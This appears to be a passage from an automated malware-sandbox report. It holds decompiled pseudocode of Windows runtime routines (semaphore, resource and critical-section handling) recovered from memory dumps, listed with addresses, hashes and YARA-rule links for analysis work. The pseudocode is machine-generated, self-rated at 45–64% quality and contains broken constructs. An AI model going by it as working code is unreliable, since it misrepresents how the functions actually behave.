                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-4236105082
                                                                                                                                                              • Opcode ID: 602549c46d6e7ce3d90d97cd05e953f291003eb5007ca814d3775d1e237439b1
                                                                                                                                                              • Instruction ID: e2665d3aa333c733067cf8e60b2b342a93265a05e69ba36f0c33dac8018da9a4
                                                                                                                                                              • Opcode Fuzzy Hash: 602549c46d6e7ce3d90d97cd05e953f291003eb5007ca814d3775d1e237439b1
                                                                                                                                                              • Instruction Fuzzy Hash: A6511B31B042196FEB15DB18CC82FA633ADEBD4710F218629FD64DB386D975EC918B90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008F14C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E008F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x992088; // 0x77473921
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E008E7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008F13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E008E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E008E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008B2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                              0x008f14c0
                                                                                                                                                              0x008f14cb
                                                                                                                                                              0x008f14d2
                                                                                                                                                              0x008f14d6
                                                                                                                                                              0x008f14da
                                                                                                                                                              0x008f14de
                                                                                                                                                              0x008f14e3
                                                                                                                                                              0x008f157a
                                                                                                                                                              0x008f157a
                                                                                                                                                              0x008f14f1
                                                                                                                                                              0x008f14f3
                                                                                                                                                              0x0091ea0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ea15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ea15
                                                                                                                                                              0x008f14f9
                                                                                                                                                              0x008f14f9
                                                                                                                                                              0x008f14fe
                                                                                                                                                              0x008f1504
                                                                                                                                                              0x0091ea1a
                                                                                                                                                              0x0091ea1f
                                                                                                                                                              0x0091ea21
                                                                                                                                                              0x0091ea22
                                                                                                                                                              0x0091ea27
                                                                                                                                                              0x0091ea2a
                                                                                                                                                              0x0091ea2a
                                                                                                                                                              0x008f1515
                                                                                                                                                              0x008f1517
                                                                                                                                                              0x008f156d
                                                                                                                                                              0x008f1572
                                                                                                                                                              0x008f1575
                                                                                                                                                              0x008f1575
                                                                                                                                                              0x008f151e
                                                                                                                                                              0x0091ea50
                                                                                                                                                              0x0091ea55
                                                                                                                                                              0x0091ea58
                                                                                                                                                              0x0091ea58
                                                                                                                                                              0x008f152e
                                                                                                                                                              0x008f1531
                                                                                                                                                              0x008f1533
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f1535
                                                                                                                                                              0x008f1541
                                                                                                                                                              0x008f1549
                                                                                                                                                              0x008f1549
                                                                                                                                                              0x008f1533
                                                                                                                                                              0x008f14f3
                                                                                                                                                              0x008f1559

                                                                                                                                                              APIs
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 0091EA22
                                                                                                                                                                • Part of subcall function 008F13CB: ___swprintf_l.LIBCMT ref: 008F146B
                                                                                                                                                                • Part of subcall function 008F13CB: ___swprintf_l.LIBCMT ref: 008F1490
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 008F156D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: !9Gw$%%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-2276783925
                                                                                                                                                              • Opcode ID: f5a3ad79bd5c9b0194293e268a87f381660093a7608c75863151cddaf3ab89e0
                                                                                                                                                              • Instruction ID: fb1334aa2429df564810b7467a041b8c332252107901421384f4433aab315157
                                                                                                                                                              • Opcode Fuzzy Hash: f5a3ad79bd5c9b0194293e268a87f381660093a7608c75863151cddaf3ab89e0
                                                                                                                                                              • Instruction Fuzzy Hash: 2F218E72A0061DEBCF21DE68CC45AFA73ACFB54704F544156FE46E3240DB74AA588BE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008D53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E008D53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009901c0;
									_push(_t92);
									_push(0);
									_t37 = E008AF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E008F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00903F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00903F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0093217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00903F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E008F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E008D5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E008AF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E008F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E008AF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E008F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E008AF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E008F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E008D5329(_t74, _t92);
													_push(1);
													_t48 = E008D53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                              0x008d53ab
                                                                                                                                                              0x008d53ae
                                                                                                                                                              0x008d53b1
                                                                                                                                                              0x008d53b4
                                                                                                                                                              0x008d53b7
                                                                                                                                                              0x008f05b6
                                                                                                                                                              0x008f05c0
                                                                                                                                                              0x008f05c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008f05c9
                                                                                                                                                              0x008f05c9
                                                                                                                                                              0x008f05cc
                                                                                                                                                              0x008f05d5
                                                                                                                                                              0x008f05d5
                                                                                                                                                              0x008d53bd
                                                                                                                                                              0x008d53bd
                                                                                                                                                              0x008d53bd
                                                                                                                                                              0x008d53be
                                                                                                                                                              0x008d53be
                                                                                                                                                              0x008d53be
                                                                                                                                                              0x008d53c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912269
                                                                                                                                                              0x0091226d
                                                                                                                                                              0x00912349
                                                                                                                                                              0x0091234d
                                                                                                                                                              0x00912273
                                                                                                                                                              0x00912276
                                                                                                                                                              0x00912279
                                                                                                                                                              0x0091227e
                                                                                                                                                              0x00912283
                                                                                                                                                              0x00912287
                                                                                                                                                              0x0091228a
                                                                                                                                                              0x0091228d
                                                                                                                                                              0x0091228f
                                                                                                                                                              0x009122bc
                                                                                                                                                              0x009122bc
                                                                                                                                                              0x009122bc
                                                                                                                                                              0x009122be
                                                                                                                                                              0x009122c4
                                                                                                                                                              0x009122cc
                                                                                                                                                              0x009122d0
                                                                                                                                                              0x009122d6
                                                                                                                                                              0x009122d7
                                                                                                                                                              0x009122da
                                                                                                                                                              0x009122df
                                                                                                                                                              0x009122e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122e6
                                                                                                                                                              0x009122e9
                                                                                                                                                              0x009122f4
                                                                                                                                                              0x009122f9
                                                                                                                                                              0x009122fa
                                                                                                                                                              0x00912305
                                                                                                                                                              0x00912314
                                                                                                                                                              0x00912319
                                                                                                                                                              0x0091231a
                                                                                                                                                              0x0091231d
                                                                                                                                                              0x00912320
                                                                                                                                                              0x00912323
                                                                                                                                                              0x00912323
                                                                                                                                                              0x00912328
                                                                                                                                                              0x0091232d
                                                                                                                                                              0x0091232f
                                                                                                                                                              0x00912331
                                                                                                                                                              0x00912336
                                                                                                                                                              0x00912336
                                                                                                                                                              0x0091233b
                                                                                                                                                              0x0091233d
                                                                                                                                                              0x00912350
                                                                                                                                                              0x00912351
                                                                                                                                                              0x00912356
                                                                                                                                                              0x00912359
                                                                                                                                                              0x00912359
                                                                                                                                                              0x0091235b
                                                                                                                                                              0x0091235d
                                                                                                                                                              0x008d5367
                                                                                                                                                              0x008d536b
                                                                                                                                                              0x008d5372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912363
                                                                                                                                                              0x00912363
                                                                                                                                                              0x00912369
                                                                                                                                                              0x0091236a
                                                                                                                                                              0x0091236c
                                                                                                                                                              0x00912371
                                                                                                                                                              0x00912373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00912379
                                                                                                                                                              0x00912379
                                                                                                                                                              0x0091237a
                                                                                                                                                              0x0091237f
                                                                                                                                                              0x0091237f
                                                                                                                                                              0x00912385
                                                                                                                                                              0x00912386
                                                                                                                                                              0x00912389
                                                                                                                                                              0x0091238e
                                                                                                                                                              0x00912390
                                                                                                                                                              0x008d5378
                                                                                                                                                              0x008d537c
                                                                                                                                                              0x00912396
                                                                                                                                                              0x00912396
                                                                                                                                                              0x00912397
                                                                                                                                                              0x0091239c
                                                                                                                                                              0x009123a2
                                                                                                                                                              0x009123a3
                                                                                                                                                              0x009123a6
                                                                                                                                                              0x009123ab
                                                                                                                                                              0x009123ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009123b3
                                                                                                                                                              0x009123b3
                                                                                                                                                              0x009123b4
                                                                                                                                                              0x009123b9
                                                                                                                                                              0x009123ba
                                                                                                                                                              0x009123ba
                                                                                                                                                              0x009123bc
                                                                                                                                                              0x009123bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00909153
                                                                                                                                                              0x00909158
                                                                                                                                                              0x0090915a
                                                                                                                                                              0x0090915e
                                                                                                                                                              0x00909160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00909166
                                                                                                                                                              0x00909166
                                                                                                                                                              0x00909171
                                                                                                                                                              0x00909176
                                                                                                                                                              0x00909176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00909160
                                                                                                                                                              0x009123c6
                                                                                                                                                              0x009123cb
                                                                                                                                                              0x009123ce
                                                                                                                                                              0x009123d7
                                                                                                                                                              0x009123d7
                                                                                                                                                              0x009123ad
                                                                                                                                                              0x00912390
                                                                                                                                                              0x00912373
                                                                                                                                                              0x0091233f
                                                                                                                                                              0x0091233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091233f
                                                                                                                                                              0x00912291
                                                                                                                                                              0x00912291
                                                                                                                                                              0x00912293
                                                                                                                                                              0x00912295
                                                                                                                                                              0x0091229a
                                                                                                                                                              0x009122a1
                                                                                                                                                              0x009122a3
                                                                                                                                                              0x009122a7
                                                                                                                                                              0x009122a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122ab
                                                                                                                                                              0x009122ad
                                                                                                                                                              0x009122af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122af
                                                                                                                                                              0x009122b1
                                                                                                                                                              0x009122b4
                                                                                                                                                              0x009122b4
                                                                                                                                                              0x009122b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009122b6
                                                                                                                                                              0x0091228f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091226d
                                                                                                                                                              0x008d53cb
                                                                                                                                                              0x008d53ce
                                                                                                                                                              0x008d53d0
                                                                                                                                                              0x008d53d4
                                                                                                                                                              0x008d53d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008d53d8
                                                                                                                                                              0x008d53e3
                                                                                                                                                              0x008d53ea
                                                                                                                                                              0x008d53ea
                                                                                                                                                              0x008d53d6
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009122F4
                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009122FC
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 00912328
                                                                                                                                                              • RTL: Resource at %p, xrefs: 0091230B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-871070163
                                                                                                                                                              • Opcode ID: 5965b283db0b30e4a4fc38bdce2ff792f3290dea9526c2b1c5c79b417ef980d0
                                                                                                                                                              • Instruction ID: 0c22c9eff537e331c2097d74ef2cb75997a49c6087664edbfbe1cc00141bd997
                                                                                                                                                              • Opcode Fuzzy Hash: 5965b283db0b30e4a4fc38bdce2ff792f3290dea9526c2b1c5c79b417ef980d0
                                                                                                                                                              • Instruction Fuzzy Hash: AB5106717006056BEB15AB28CC81FA6739CFF55760F10462AFE14DB382EA75ED428791
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008DEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E008DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E008CDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x99793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008B16C0(_t39);
				} else {
					_t40 = E008AF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E008F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008B01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x99793c; // 0x0
								_push(_t85);
								_t44 = E008B1F28(_t71);
							} else {
								_t44 = E008AF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E008F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00932306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E008DEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E008F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00903F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00903F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9920c0;
								if(_t85 != 0x9920c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0093217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00903F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                              0x008dec56
                                                                                                                                                              0x008dec56
                                                                                                                                                              0x008dec56
                                                                                                                                                              0x008dec5c
                                                                                                                                                              0x008dec64
                                                                                                                                                              0x009123e6
                                                                                                                                                              0x009123eb
                                                                                                                                                              0x009123eb
                                                                                                                                                              0x008dec6a
                                                                                                                                                              0x008dec6c
                                                                                                                                                              0x008dec6f
                                                                                                                                                              0x009123f3
                                                                                                                                                              0x009123f8
                                                                                                                                                              0x009123fa
                                                                                                                                                              0x009123fc
                                                                                                                                                              0x008dec75
                                                                                                                                                              0x008dec76
                                                                                                                                                              0x008dec76
                                                                                                                                                              0x008dec7b
                                                                                                                                                              0x008dec7c
                                                                                                                                                              0x008dec7e
                                                                                                                                                              0x00912406
                                                                                                                                                              0x00912407
                                                                                                                                                              0x0091240c
                                                                                                                                                              0x0091240d
                                                                                                                                                              0x0091240d
                                                                                                                                                              0x0091240d
                                                                                                                                                              0x00912414
                                                                                                                                                              0x00912417
                                                                                                                                                              0x0091241e
                                                                                                                                                              0x00912435
                                                                                                                                                              0x00912438
                                                                                                                                                              0x0091243c
                                                                                                                                                              0x0091243f
                                                                                                                                                              0x00912442
                                                                                                                                                              0x00912443
                                                                                                                                                              0x00912446
                                                                                                                                                              0x00912449
                                                                                                                                                              0x00912453
                                                                                                                                                              0x00912455
                                                                                                                                                              0x0091245b
                                                                                                                                                              0x0091245b
                                                                                                                                                              0x008deb99
                                                                                                                                                              0x008deb99
                                                                                                                                                              0x008deb9c
                                                                                                                                                              0x008deb9d
                                                                                                                                                              0x008deb9f
                                                                                                                                                              0x008deba2
                                                                                                                                                              0x00912465
                                                                                                                                                              0x0091246b
                                                                                                                                                              0x0091246d
                                                                                                                                                              0x008deba8
                                                                                                                                                              0x008deba9
                                                                                                                                                              0x008deba9
                                                                                                                                                              0x008debae
                                                                                                                                                              0x008debb3
                                                                                                                                                              0x008debb9
                                                                                                                                                              0x008debbb
                                                                                                                                                              0x00912513
                                                                                                                                                              0x00912514
                                                                                                                                                              0x00912519
                                                                                                                                                              0x0091251b
                                                                                                                                                              0x008dec2a
                                                                                                                                                              0x008dec2d
                                                                                                                                                              0x008dec33
                                                                                                                                                              0x008dec36
                                                                                                                                                              0x008dec3a
                                                                                                                                                              0x008dec3e
                                                                                                                                                              0x008dec40
                                                                                                                                                              0x008dec47
                                                                                                                                                              0x008dec47
                                                                                                                                                              0x008dec40
                                                                                                                                                              0x008b22c6
                                                                                                                                                              0x008debc1
                                                                                                                                                              0x008debc1
                                                                                                                                                              0x008debc5
                                                                                                                                                              0x008dec9a
                                                                                                                                                              0x008dec9a
                                                                                                                                                              0x008debd6
                                                                                                                                                              0x008debd6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008debbb
                                                                                                                                                              0x00912477
                                                                                                                                                              0x0091247c
                                                                                                                                                              0x00912486
                                                                                                                                                              0x0091248b
                                                                                                                                                              0x00912496
                                                                                                                                                              0x0091249b
                                                                                                                                                              0x0091249d
                                                                                                                                                              0x009124a0
                                                                                                                                                              0x009124a3
                                                                                                                                                              0x009124aa
                                                                                                                                                              0x009124aa
                                                                                                                                                              0x009124a5
                                                                                                                                                              0x009124a5
                                                                                                                                                              0x009124a5
                                                                                                                                                              0x009124ac
                                                                                                                                                              0x009124af
                                                                                                                                                              0x009124b0
                                                                                                                                                              0x009124b3
                                                                                                                                                              0x009124b9
